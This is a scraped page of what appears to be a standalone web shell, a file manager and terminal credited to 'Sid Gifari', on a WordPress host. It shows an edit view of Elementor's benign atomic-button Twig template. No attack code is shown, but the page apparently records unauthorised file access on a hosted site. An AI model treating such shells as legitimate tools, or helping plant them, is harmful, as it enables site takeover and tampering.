🚀 Advanced Web Server Manager
Complete File Manager & Terminal - Standalone Version
By Sid Gifari | Gifari Industries
Current path:
/
/
mnt
/
web613
/
c2
/
38
/
570372438
/
htdocs
/
STRATO-apps
/
wordpress_02
/
app
/
wp-content
/
plugins
/
elementor
/
modules
/
atomic-widgets
/
elements
/
atomic-button
✏️
Editing: atomic-button.html.twig
{% import 'elementor/macros' as m %} {%- set allowed_tags = '<b><strong><sup><sub><s><em><i><u><del><span><br>' -%} {%- set classes = settings.classes | merge( [ base_styles.base ] ) | join(' ') -%} {%- if settings.link is defined and settings.link.href is defined and settings.link.href is not empty -%} <{{ settings.link.tag | default('a') | e('html_tag') }} {{- m.render_link_attributes(settings.link) }} class="{{ classes }}" data-interaction-id="{{ interaction_id }}" {{- m.render_custom_attributes(settings) }}> {{ settings.text | striptags(allowed_tags) | raw }} </{{ settings.link.tag | default('a') | e('html_tag') }}> {%- else -%} <button class="{{ classes }}" data-interaction-id="{{ interaction_id }}" {{- m.render_custom_attributes(settings) }}> {{ settings.text | striptags(allowed_tags) | raw }} </button> {%- endif %}
💾 Save Changes
❌ Cancel